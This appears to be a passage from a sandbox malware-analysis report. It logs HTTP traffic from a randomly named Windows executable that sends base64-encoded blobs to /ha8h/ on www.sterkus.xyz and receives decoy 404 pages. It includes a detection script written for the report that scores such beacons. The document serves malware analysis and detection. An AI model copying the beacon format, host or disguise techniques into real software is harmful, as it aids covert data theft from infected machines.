                                                                Data Raw: 69 34 66 54 62 56 3d 43 5a 5a 67 5a 38 77 52 47 7a 33 68 5a 4e 46 41 70 76 51 59 67 46 2b 76 61 50 45 64 58 4a 59 52 58 6f 34 34 62 66 4d 58 36 43 71 6f 69 74 35 35 7a 55 33 52 4b 41 76 48 4d 34 4f 35 72 69 68 34 67 72 52 69 47 39 36 6d 35 2b 4e 50 57 46 4f 43 4e 69 44 70 2f 77 59 65 30 7a 79 61 59 37 45 76 72 73 55 66 46 4c 41 47 33 54 46 6f 56 33 69 6e 56 52 4d 43 35 61 51 62 4a 72 36 79 36 58 44 35 54 6b 72 35 35 6a 79 32 64 69 53 72 56 45 4b 2f 5a 2b 59 69 46 6d 2f 4f 67 43 67 51 43 4a 78 47 72 74 74 61 79 79 76 48 4d 52 37 31 35 59 47 71 5a 49 5a 42 62 61 30 34 35 58 64 6f 55 4c 61 52 73 6c 74 41 4d 6e 6b 48 74 4b 49 7a 77 61 59 6b 32 5a 47 58 4c 49 44 7a 38 4c 65 58 6b 57 31 78 65 77 3d 3d
                                                                Data Ascii: i4fTbV=CZZgZ8wRGz3hZNFApvQYgF+vaPEdXJYRXo44bfMX6Cqoit55zU3RKAvHM4O5rih4grRiG96m5+NPWFOCNiDp/wYe0zyaY7EvrsUfFLAG3TFoV3inVRMC5aQbJr6y6XD5Tkr55jy2diSrVEK/Z+YiFm/OgCgQCJxGrttayyvHMR715YGqZIZBba045XdoULaRsltAMnkHtKIzwaYk2ZGXLIDz8LeXkW1xew==
                                                                Sep 22, 2024 17:42:03.697058916 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sun, 22 Sep 2024 15:42:03 GMT
                                                                Server: Apache
                                                                X-Frame-Options: SAMEORIGIN
                                                                Content-Length: 13928
                                                                X-XSS-Protection: 1; mode=block
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                Sep 22, 2024 17:42:03.697113991 CEST | 224 | IN | Data Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                                Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet -->
                                                                Sep 22, 2024 17:42:03.697150946 CEST | 1236 | IN | Data Raw: 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61
                                                                Data Ascii: <link href="css/style.css" rel="stylesheet"></head><body> <div class="container-xxl bg-white p-0"> ... Spinner Start --> <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-100 top
                                                                Sep 22, 2024 17:42:03.697186947 CEST | 224 | IN | Data Raw: 73 70 61 6e 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 2d 69 63 6f 6e 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav ms-auto"> <
                                                                Sep 22, 2024 17:42:03.697217941 CEST | 1236 | IN | Data Raw: 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6e 61 76 2d 6c 69 6e 6b 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61
                                                                Data Ascii: a href="index.html" class="nav-item nav-link">Home</a> <a href="about.html" class="nav-item nav-link">About</a> <div class="nav-item dropdown"> <a href="#" class="n
                                                                Sep 22, 2024 17:42:03.697251081 CEST | 224 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76
                                                                Data Ascii: </div> <a href="contact.html" class="nav-item nav-link">Contact</a> </div> <a href="" class="btn btn-primary px-3 d-none d-lg-flex">Add Prop
                                                                Sep 22, 2024 17:42:03.697283983 CEST | 1236 | IN | Data Raw: 65 72 74 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d
                                                                Data Ascii: erty</a> </div> </nav> </div> ... Navbar End --> ... Header Start --> <div class="container-fluid header bg-white p-0"> <div class="row g-0 align-items-center
                                                                Sep 22, 2024 17:42:03.697315931 CEST | 1236 | IN | Data Raw: 3d 22 30 2e 31 73 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 33 35 70 78 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: ="0.1s" style="padding: 35px;"> <div class="container"> <div class="row g-2"> <div class="col-md-10"> <div class="row g-2"> <div class="co
                                                                Sep 22, 2024 17:42:03.697350979 CEST | 448 | IN | Data Raw: 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 32 22 3e 4c 6f 63 61 74 69 6f 6e 20 32 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f
                                                                Data Ascii: <option value="2">Location 2</option> <option value="3">Location 3</option> </select> </div> </div>
                                                                Sep 22, 2024 17:42:03.697387934 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 65 61 72 63 68 20 45 6e 64 20 2d 2d 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 34 30 34 20
                                                                Data Ascii: </div> </div> ... Search End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container text-center"> <div cla
                                                                Sep 22, 2024 17:42:03.702311993 CEST | 1236 | IN | Data Raw: 65 20 6d 62 2d 34 22 3e 47 65 74 20 49 6e 20 54 6f 75 63 68 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61
                                                                Data Ascii: e mb-4">Get In Touch</h5> <p class="mb-2"><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p class="mb-2"><i class="fa fa-phone-alt me-3"></i>+012 345 67890</p>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                15 | 192.168.2.6 | 49737 | 209.74.95.29 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:05.663593054 CEST | 1717 | OUT | POST /ha8h/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.sterkus.xyz
                                                                Origin: http://www.sterkus.xyz
                                                                Referer: http://www.sterkus.xyz/ha8h/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 43 5a 5a 67 5a 38 77 52 47 7a 33 68 5a 4e 46 41 70 76 51 59 67 46 2b 76 61 50 45 64 58 4a 59 52 58 6f 34 34 62 66 4d 58 36 43 69 6f 69 2f 78 35 78 7a 72 52 4c 41 76 48 53 49 4f 34 72 69 68 70 67 6f 68 6d 47 39 33 64 35 38 31 50 58 6e 57 43 46 77 37 70 78 77 59 65 70 6a 79 62 46 4c 46 74 72 73 45 62 46 50 6b 47 33 54 46 6f 56 31 57 6e 63 67 4d 43 2b 71 51 55 4f 72 37 7a 73 6e 44 52 54 6b 79 45 35 6a 2f 4c 63 53 79 72 62 41 57 2f 4b 38 41 69 64 32 2f 4d 6c 43 67 2b 43 4a 39 5a 72 74 68 38 79 78 79 61 4d 58 48 31 36 76 2f 32 44 70 6c 65 47 4a 63 70 72 6e 78 32 66 64 65 55 72 6d 5a 4e 44 33 55 79 76 35 67 37 2f 75 6f 51 67 4b 6a 53 41 34 4c 4e 37 4e 36 43 67 33 73 72 4b 4e 62 34 2f 68 45 68 71 67 47 47 41 30 7a 33 69 2f 77 5a 73 55 73 71 38 55 42 39 71 44 57 6b 41 6f 71 4e 77 44 73 61 58 37 6d 75 69 62 6f 71 46 44 6b 2f 66 67 76 68 4f 78 6b 73 63 71 78 64 36 43 30 39 79 5a 71 34 33 67 75 53 59 74 32 55 66 36 44 32 38 56 6a 2b 30 76 38 4e 2f 33 59 30 65 5a 72 72 57 6f 70 2f 69 51 74 [TRUNCATED]
                                                                Data Ascii: i4fTbV=CZZgZ8wRGz3hZNFApvQYgF+vaPEdXJYRXo44bfMX6Cioi/x5xzrRLAvHSIO4rihpgohmG93d581PXnWCFw7pxwYepjybFLFtrsEbFPkG3TFoV1WncgMC+qQUOr7zsnDRTkyE5j/LcSyrbAW/K8Aid2/MlCg+CJ9Zrth8yxyaMXH16v/2DpleGJcprnx2fdeUrmZND3Uyv5g7/uoQgKjSA4LN7N6Cg3srKNb4/hEhqgGGA0z3i/wZsUsq8UB9qDWkAoqNwDsaX7muiboqFDk/fgvhOxkscqxd6C09yZq43guSYt2Uf6D28Vj+0v8N/3Y0eZrrWop/iQt [TRUNCATED]
                                                                Sep 22, 2024 17:42:06.336571932 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sun, 22 Sep 2024 15:42:06 GMT
                                                                Server: Apache
                                                                X-Frame-Options: SAMEORIGIN
                                                                Content-Length: 13928
                                                                X-XSS-Protection: 1; mode=block
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                Sep 22, 2024 17:42:06.336606026 CEST | 1236 | IN | Data Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                                Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                                Sep 22, 2024 17:42:06.336620092 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                                Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
                                                                Sep 22, 2024 17:42:06.336694002 CEST | 1236 | IN | Data Raw: 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72
                                                                Data Ascii: s="nav-item dropdown"> <a href="#" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0">
                                                                Sep 22, 2024 17:42:06.336707115 CEST | 896 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: <li class="breadcrumb-item"><a href="#">Home</a></li> <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-current="page">4
                                                                Sep 22, 2024 17:42:06.336806059 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c
                                                                Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
                                                                Sep 22, 2024 17:42:06.336817980 CEST | 1236 | IN | Data Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 22 3e 0d 0a 20 20 20 20
                                                                Data Ascii: div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div> </div>
                                                                Sep 22, 2024 17:42:06.336843014 CEST | 448 | IN | Data Raw: 70 74 2d 35 20 6d 74 2d 35 20 77 6f 77 20 66 61 64 65 49 6e 22 20 64 61 74 61 2d 77 6f 77 2d 64 65 6c 61 79 3d 22 30 2e 31 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79
                                                                Data Ascii: pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s"> <div class="container py-5"> <div class="row g-5"> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Get In Touc
                                                                Sep 22, 2024 17:42:06.336913109 CEST | 1236 | IN | Data Raw: 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e
                                                                Data Ascii: 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i c
                                                                Sep 22, 2024 17:42:06.336922884 CEST | 224 | IN | Data Raw: 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d
                                                                Data Ascii: & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">
                                                                Sep 22, 2024 17:42:06.341563940 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69
                                                                Data Ascii: <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4">

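The three sessions recorded here share one shape: a POST or GET to /ha8h/ on www.sterkus.xyz, a single form field named i4fTbV carrying a long base64-looking blob, the legacy "MSIE 8.0; Windows NT 5.1" User-Agent, and a 404 reply from the Apache front end that still ships a 13928-byte real-estate template page. The script below is an added example written for this report, not Joe Sandbox output and not code from the sample: it parses raw HTTP exchanges of that kind and scores them with heuristics I chose (short directory path, short field name with a base64 value, the legacy User-Agent, Connection: close together with Cache-Control: no-cache, and a 404 that carries a full HTML body). The request samples are copied from sessions 14 and 16 above with the header set abridged, the 404 body is stand-in text, and the indicator names, thresholds and benign control request are my own assumptions.

```python
import re
from typing import Optional

# Heuristics chosen for this example (assumptions, not fields of the report).
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;"
SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,8}/$")       # e.g. /ha8h/
SHORT_KEY = re.compile(r"^[A-Za-z0-9]{4,8}$")         # e.g. i4fTbV
B64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")    # long base64-looking value
SUSPECT_AT = 3                                        # indicators needed for a "suspect" verdict


def parse_http(raw: str) -> dict:
    """Split a raw HTTP/1.x message into start line, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers, "body": body}


def request_path(req: dict) -> str:
    """Path component of the request target, without the query string."""
    return req["start"].split(" ", 2)[1].partition("?")[0]


def form_fields(req: dict) -> list:
    """(name, value) pairs from the query string and, for urlencoded POSTs, the body.
    Values are kept raw on purpose so base64 '+' and '/' are not decoded away."""
    method, target, _ = req["start"].split(" ", 2)
    blobs = [target.partition("?")[2]]
    if method == "POST" and "x-www-form-urlencoded" in req["headers"].get("content-type", ""):
        blobs.append(req["body"])
    pairs = []
    for blob in blobs:
        for item in filter(None, blob.split("&")):
            name, _, value = item.partition("=")
            pairs.append((name, value))
    return pairs


def score_exchange(raw_request: str, raw_response: Optional[str] = None) -> dict:
    """Score one request (plus optional response) and pull out the IOCs worth keeping."""
    req = parse_http(raw_request)
    h = req["headers"]
    hits = []
    path = request_path(req)
    if SHORT_DIR.match(path):
        hits.append("short-directory-path")
    if h.get("user-agent", "").startswith(LEGACY_UA):
        hits.append("legacy-msie8-user-agent")
    blob_keys = [k for k, v in form_fields(req) if SHORT_KEY.match(k) and B64ISH.match(v)]
    if blob_keys:
        hits.append("short-field-base64-blob")
    if h.get("connection", "").lower() == "close" and h.get("cache-control", "").lower() == "no-cache":
        hits.append("close-and-no-cache")
    if raw_response is not None:
        resp = parse_http(raw_response)
        status = resp["start"].split(" ", 2)[1]
        length = int(resp["headers"].get("content-length", "0") or 0)
        if status == "404" and length > 4096 and "text/html" in resp["headers"].get("content-type", ""):
            hits.append("fake-404-with-full-page")  # a 404 that still delivers a whole site page
    return {
        "verdict": "suspect" if len(hits) >= SUSPECT_AT else "ok",
        "indicators": hits,
        "ioc": {"host": h.get("host", ""), "path": path, "field": blob_keys[0] if blob_keys else None},
    }


UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; "
      ".NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)")
# Constructed samples: requests copied from sessions 14 and 16 (headers abridged), 404 body is stand-in text.
SAMPLE_POST = (
    "POST /ha8h/ HTTP/1.1\r\nAccept: */*\r\nConnection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 235\r\n"
    f"Cache-Control: no-cache\r\nHost: www.sterkus.xyz\r\nUser-Agent: {UA}\r\n\r\n"
    "i4fTbV=CZZgZ8wRGz3hZNFApvQYgF+vaPEdXJYRXo44bfMX6Cqoit55zU3RKAvHM4O5rih4grRiG96m5+NPWFOCNiDp/wYe0zy"
    "aY7EvrsUfFLAG3TFoV3inVRMC5aQbJr6y6XD5Tkr55jy2diSrVEK/Z+YiFm/OgCgQCJxGrttayyvHMR715YGqZIZBba045Xdo"
    "ULaRsltAMnkHtKIzwaYk2ZGXLIDz8LeXkW1xew=="
)
SAMPLE_GET = (
    "GET /ha8h/?i4fTbV=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX6"
    "1WMZ5CKSP5Ywj/pBJKYAqDUZeWyiIAYv47gxX4Wz9AjmXGPf0TM=&azq=fdKL HTTP/1.1\r\nAccept: */*\r\n"
    f"Connection: close\r\nHost: www.sterkus.xyz\r\nUser-Agent: {UA}\r\n\r\n"
)
SAMPLE_404 = ("HTTP/1.1 404 Not Found\r\nServer: Apache\r\nContent-Length: 13928\r\n"
              "Connection: close\r\nContent-Type: text/html\r\n\r\n<!DOCTYPE html> stand-in body")
BENIGN_GET = ("GET /index.html?q=shoes HTTP/1.1\r\nHost: www.example.com\r\nConnection: keep-alive\r\n"
              "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n\r\n")

if __name__ == "__main__":
    for label, req, resp in (("POST", SAMPLE_POST, SAMPLE_404), ("GET", SAMPLE_GET, SAMPLE_404), ("benign", BENIGN_GET, None)):
        print(label, score_exchange(req, resp))
```

The field values are deliberately not URL-decoded: parse_qsl would turn the '+' inside the blob into a space and the base64 check would stop matching. The 404 indicator is the weakest on its own, since plenty of real sites answer 404 with a styled page, which is why the verdict needs three indicators rather than one.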

                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                16 | 192.168.2.6 | 49738 | 209.74.95.29 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:08.207600117 CEST | 419 | OUT | GET /ha8h/?i4fTbV=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX61WMZ5CKSP5Ywj/pBJKYAqDUZeWyiIAYv47gxX4Wz9AjmXGPf0TM=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.sterkus.xyz
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:42:08.814095974 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sun, 22 Sep 2024 15:42:08 GMT
                                                                Server: Apache
